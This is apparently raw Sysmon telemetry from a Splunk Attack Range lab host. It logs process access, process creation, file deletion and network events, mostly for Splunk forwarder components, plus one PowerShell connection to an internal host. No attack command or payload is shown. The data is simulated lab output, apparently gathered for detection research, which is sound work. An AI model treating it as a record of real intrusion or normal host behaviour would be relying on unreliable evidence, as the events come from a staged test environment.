21:59:40.388{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.388{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-83CC-613A-E396-03000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.388{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.388{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83CC-613A-E396-03000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.372{B81B27B7-83CC-613A-E396-03000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC819E434F676D6B4A70876796F3BEF6,SHA256=BE0C5C2D1AC286D46035EB44A8D4754AFD00EA5CC0B9250EC12DD3EC2D2E66A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.772{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83CD-613A-E596-03000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.772{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.772{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.772{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.772{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.757{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-83CD-613A-E596-03000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.757{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83CD-613A-E596-03000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.756{B81B27B7-83CD-613A-E596-03000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.391{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D72534F3AB59491350A4515690F939B,SHA256=E9B3C3FAB3A231AACB80BB65A851B5A38699EE454B68B40F4CFB84F36551ED92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF7293FAC577249B3A24053F45BA12E7,SHA256=BE9F4F917D09C830E19A81C9C77F2CE69782B0287FEEC1E6190B8624CEA58315,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.239{B81B27B7-83CD-613A-E496-03000000C801}33404444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.090{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83CD-613A-E496-03000000C801}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.088{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.088{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.088{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.088{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.087{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-83CD-613A-E496-03000000C801}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.087{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83CD-613A-E496-03000000C801}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.071{B81B27B7-83CD-613A-E496-03000000C801}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:42.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=127E10711672FAE496F80491255F3FEB,SHA256=58EA5011DAEB70039B865F6A39880D59ED53461815D7175CEA0AD007B8CEDA82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:42.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D72534F3AB59491350A4515690F939B,SHA256=E9B3C3FAB3A231AACB80BB65A851B5A38699EE454B68B40F4CFB84F36551ED92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:43.886{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=48CA802EB5B012D912ABF0935180CE28,SHA256=1E305002C46AC153383D34EC6345AF8DAFD8369D59DABDA6F991C0DB93A57672,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:43.789{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AC91F9816C79840E5DFFF7EEE0A2F2D,SHA256=D36506813E33B6F46E6A73EF311A34C9D22379D62897ADCAEF0EBF1AB4112D98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:09.436{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62196-false10.0.1.12-8000- 354300x800000000000000035128765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:08.889{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62195-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:44.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09AFF6CD4E9FD763180966781787436B,SHA256=E11FDE3D21769CDE997D12BB2D41FEA7525053F593BCB57B12E53DAC9996055D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:45.834{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BF34317BF883E6192143493194A0426,SHA256=A825787BEAE389908A06403F8E841151D354AC65954A15805BA4EB880C8F0D32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:46.864{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD6F3EF9AFC5275D4A460E6E0118AE0,SHA256=4B3E161A531F24067C372DD0D2851ABF33C38B5D4834146BC123A90DFFC706F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 